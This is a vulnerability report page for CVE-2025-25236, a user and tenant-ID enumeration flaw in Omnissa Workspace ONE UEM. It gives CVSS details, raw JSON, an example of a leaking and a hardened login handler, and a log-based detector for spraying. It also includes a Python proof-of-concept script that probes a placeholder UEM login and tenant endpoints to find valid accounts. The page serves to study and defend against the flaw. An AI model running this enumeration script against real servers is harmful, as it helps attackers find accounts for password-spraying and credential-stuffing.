Security Vulnerability Report
CVE-2025-25236 CVSS 5.3 MEDIUM

CVE-2025-25236

Published: 2025-11-12 18:15:35
Last Modified: 2026-04-15 00:35:42
Source: de5a6978-88fe-4c27-a7df-d0d5b52d5b52

Description

Omnissa Workspace ONE UEM contains an observable response discrepancy vulnerability. A malicious actor may be able to enumerate sensitive information such as tenant ID and user accounts that could facilitate brute-force, password-spraying or credential-stuffing attacks.
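The weakness class here is CWE-204: the login path answers differently depending on whether the account exists, so an unauthenticated caller can turn any wordlist into a list of valid usernames before spending a single real password guess. The following is an added example, not code from Omnissa or from the advisory: a minimal login handler that shows the leaking pattern beside a hardened one, and the attacker-side discriminator that works against the first and not the second. The user store, salt, iteration count, error strings and wordlist are all constructed for the example.

```python
import hashlib
import hmac
from collections import Counter

# Constructed user store with one real account. A static salt and a low
# PBKDF2 iteration count keep the example fast; real code uses per-user salts.
_SALT = b"constructed-salt-for-example"
_ITERATIONS = 20_000


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"alice": _hash("correct horse battery staple")}
# Hash of a throwaway password. The hardened handler compares against it when
# the username is unknown, so every request does the same amount of work.
_DUMMY_HASH = _hash("not-a-real-password")


def login_vulnerable(username: str, password: str) -> dict:
    """CWE-204 pattern: an unknown user and a wrong password get different
    status codes and messages, and the unknown-user branch skips hashing,
    so the response body, code and timing all reveal which accounts exist."""
    if username not in USERS:
        return {"status": 404, "error": "user not found"}
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return {"status": 401, "error": "invalid password"}
    return {"status": 200, "error": None}


def login_hardened(username: str, password: str) -> dict:
    """Both failure causes collapse to one status and one message, and the
    password is hashed on every attempt whether or not the user exists."""
    stored = USERS.get(username, _DUMMY_HASH)
    digest_ok = hmac.compare_digest(stored, _hash(password))
    known = username in USERS  # checked after hashing, so no short-circuit
    if digest_ok and known:
        return {"status": 200, "error": None}
    return {"status": 401, "error": "invalid credentials"}


def enumerate_users(login, candidates, probe_password="definitely-wrong"):
    """Attacker's view: one bad password per candidate, then report the
    candidates whose (status, message) pair differs from the majority
    response. Returns [] when the endpoint gives nothing away."""
    responses = {u: login(u, probe_password) for u in candidates}
    signatures = {u: (r["status"], r["error"]) for u, r in responses.items()}
    baseline, _ = Counter(signatures.values()).most_common(1)[0]
    return sorted(u for u, sig in signatures.items() if sig != baseline)


if __name__ == "__main__":
    wordlist = ["admin", "alice", "guest", "test", "user"]
    print("vulnerable endpoint leaks:", enumerate_users(login_vulnerable, wordlist))
    print("hardened endpoint leaks:  ", enumerate_users(login_hardened, wordlist))
```

The discriminator only looks at status and message; a real probe also compares body length, headers and response time, which is why the hardened handler hashes a dummy value for unknown users instead of returning early. A uniform response closes the oracle but does not stop the follow-on spraying the advisory mentions, so per-source rate limiting and lockout still belong on the same endpoint.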

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Omnissa Workspace ONE UEM < 25.x (exact affected versions: refer to the vendor's patch notes)
Omnissa Workspace ONE UEM < 24.x (older versions may be affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-25236 PoC - Workspace ONE UEM User Enumeration
# This PoC demonstrates the observable response discrepancy vulnerability
# (CWE-204): each candidate username is submitted with a bogus password and
# the status code, body and timing are recorded so that responses for valid
# and invalid accounts can be compared.
import time
from urllib.parse import urlparse

import requests

# Placeholder host. The endpoint path is illustrative and must be confirmed
# against the target's actual API before relying on the results.
TARGET_URL = "https://[Workspace ONE UEM Host]/api/v1/auth/login"
TIMEOUT = 10


def test_user_enumeration(username_list):
    """Test for user enumeration vulnerability by observing response differences"""
    results = []
    for username in username_list:
        payload = {
            "username": username,
            "password": "fake_password_for_testing",
        }
        # Measure response time
        start_time = time.time()
        response = requests.post(TARGET_URL, json=payload, timeout=TIMEOUT)
        end_time = time.time()
        response_time = end_time - start_time
        result = {
            "username": username,
            "status_code": response.status_code,
            "response_time": response_time,
            "response_body": response.text[:200],
            "has_user": False,
        }
        # Analyze the response for differences that indicate a valid user.
        # Valid users may get different error messages, response times, or headers.
        # The keyword check is a crude first pass ("user" also appears in generic
        # error text); compare status codes, body lengths and timings across the
        # whole result set rather than trusting this flag on its own.
        if "tenant" in response.text.lower() or "user" in response.text.lower():
            result["has_user"] = True
        results.append(result)
    return results


def check_tenant_enumeration():
    """Check for tenant ID enumeration via API endpoints"""
    # Illustrative paths; confirm against the target's actual API.
    tenant_endpoints = [
        "/api/v1/tenant/info",
        "/api/v1/system/configuration",
        "/api/v1/users/current",
    ]
    # Build from scheme and host only, so the paths are requested from the
    # server root rather than being appended under /api/v1/auth.
    parsed = urlparse(TARGET_URL)
    base_url = f"{parsed.scheme}://{parsed.netloc}"
    for endpoint in tenant_endpoints:
        try:
            response = requests.get(base_url + endpoint, timeout=TIMEOUT)
        except requests.RequestException as exc:
            print(f"[-] {endpoint}: request failed ({exc})")
            continue
        if response.status_code == 200 and "tenant" in response.text.lower():
            print(f"[+] Tenant info exposed at {endpoint}")


# Example usage
if __name__ == "__main__":
    test_users = ["admin", "user", "test", "administrator", "guest"]
    results = test_user_enumeration(test_users)
    for r in results:
        print(f"User: {r['username']}, Time: {r['response_time']:.3f}s, "
              f"Status: {r['status_code']}, Flagged: {r['has_user']}")
    check_tenant_enumeration()
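From the defender's side, the probing pattern above (one source, one failed attempt each against many different usernames in a short window) is visible in authentication logs even when the HTTP responses leak nothing. The following is an added example, not Omnissa code or the product's real log format: a small parser and a sliding-window detector run over constructed sample events. The key=value line format, the source addresses, the usernames, the window and the thresholds are all assumptions chosen for the example; the classification rule (mostly unknown accounts means enumeration, mostly known accounts with bad passwords means spraying) is the point it demonstrates.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical key=value auth-log format
# (not Omnissa's real format). Three sources:
#   203.0.113.7  - probes six different usernames once each (enumeration)
#   198.51.100.5 - one user mistypes a password three times, then succeeds
#   192.0.2.9    - one bad password against five known accounts (spray)
SAMPLE_LOG = """\
2025-11-13T10:00:01Z src=203.0.113.7 user=admin result=FAIL reason=unknown_user
2025-11-13T10:00:02Z src=203.0.113.7 user=user result=FAIL reason=unknown_user
2025-11-13T10:00:03Z src=203.0.113.7 user=test result=FAIL reason=unknown_user
2025-11-13T10:00:04Z src=203.0.113.7 user=administrator result=FAIL reason=unknown_user
2025-11-13T10:00:05Z src=203.0.113.7 user=guest result=FAIL reason=unknown_user
2025-11-13T10:00:06Z src=203.0.113.7 user=alice result=FAIL reason=invalid_password
2025-11-13T10:01:00Z src=198.51.100.5 user=bob result=FAIL reason=invalid_password
2025-11-13T10:01:20Z src=198.51.100.5 user=bob result=FAIL reason=invalid_password
2025-11-13T10:01:40Z src=198.51.100.5 user=bob result=FAIL reason=invalid_password
2025-11-13T10:02:00Z src=198.51.100.5 user=bob result=OK
2025-11-13T11:30:00Z src=192.0.2.9 user=alice result=FAIL reason=invalid_password
2025-11-13T11:30:03Z src=192.0.2.9 user=carol result=FAIL reason=invalid_password
2025-11-13T11:30:06Z src=192.0.2.9 user=dave result=FAIL reason=invalid_password
2025-11-13T11:30:09Z src=192.0.2.9 user=erin result=FAIL reason=invalid_password
2025-11-13T11:30:12Z src=192.0.2.9 user=frank result=FAIL reason=invalid_password
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)"
    r"(?: reason=(?P<reason>\S+))?$"
)


def parse_log(text):
    """Parse log lines into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        event = m.groupdict()
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return events


def detect(events, window=timedelta(minutes=5), min_distinct_users=5,
           max_attempts_per_user=2):
    """Flag a source whose failed logins inside one window spread across many
    distinct usernames with few attempts each. Classified as enumeration when
    most failures hit unknown accounts, otherwise as password spraying."""
    fails_by_src = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            fails_by_src[e["src"]].append(e)

    alerts = []
    for src, fails in fails_by_src.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits within `window`.
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            win = fails[start:end + 1]
            per_user = Counter(e["user"] for e in win)
            if (len(per_user) < min_distinct_users
                    or max(per_user.values()) > max_attempts_per_user):
                continue
            unknown = sum(1 for e in win if e["reason"] == "unknown_user")
            kind = "user_enumeration" if unknown * 2 > len(win) else "password_spray"
            alerts.append({
                "src": src,
                "kind": kind,
                "distinct_users": len(per_user),
                "first_seen": fails[start]["ts"],
                "last_seen": fails[end]["ts"],
            })
            break  # one alert per source; later events would only repeat it
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(f"[!] {alert['src']}: {alert['kind']} across "
              f"{alert['distinct_users']} users "
              f"({alert['first_seen']:%H:%M:%S} - {alert['last_seen']:%H:%M:%S})")
```

The `max_attempts_per_user` guard is what keeps the legitimate user at 198.51.100.5 out of the alerts: three failures against one account is a forgotten password, not a campaign. Note that the server can log the real failure reason for the detector while still returning one uniform message to the client; the two are independent.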

References

https://static.omnissa.com/sites/default/files/OMSA-2025-0005.pdf
https://www.omnissa.com/omnissa-security-response/
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-25236",
    "sourceIdentifier": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52",
    "published": "2025-11-12T18:15:35.200",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Omnissa Workspace ONE UEM contains an observable response discrepancy vulnerability. A malicious actor may be able to enumerate sensitive information such as tenant ID and user accounts that could facilitate brute-force, password-spraying or credential-stuffing attacks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-204"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://static.omnissa.com/sites/default/files/OMSA-2025-0005.pdf",
        "source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52"
      },
      {
        "url": "https://www.omnissa.com/omnissa-security-response/",
        "source": "de5a6978-88fe-4c27-a7df-d0d5b52d5b52"
      }
    ]
  }
}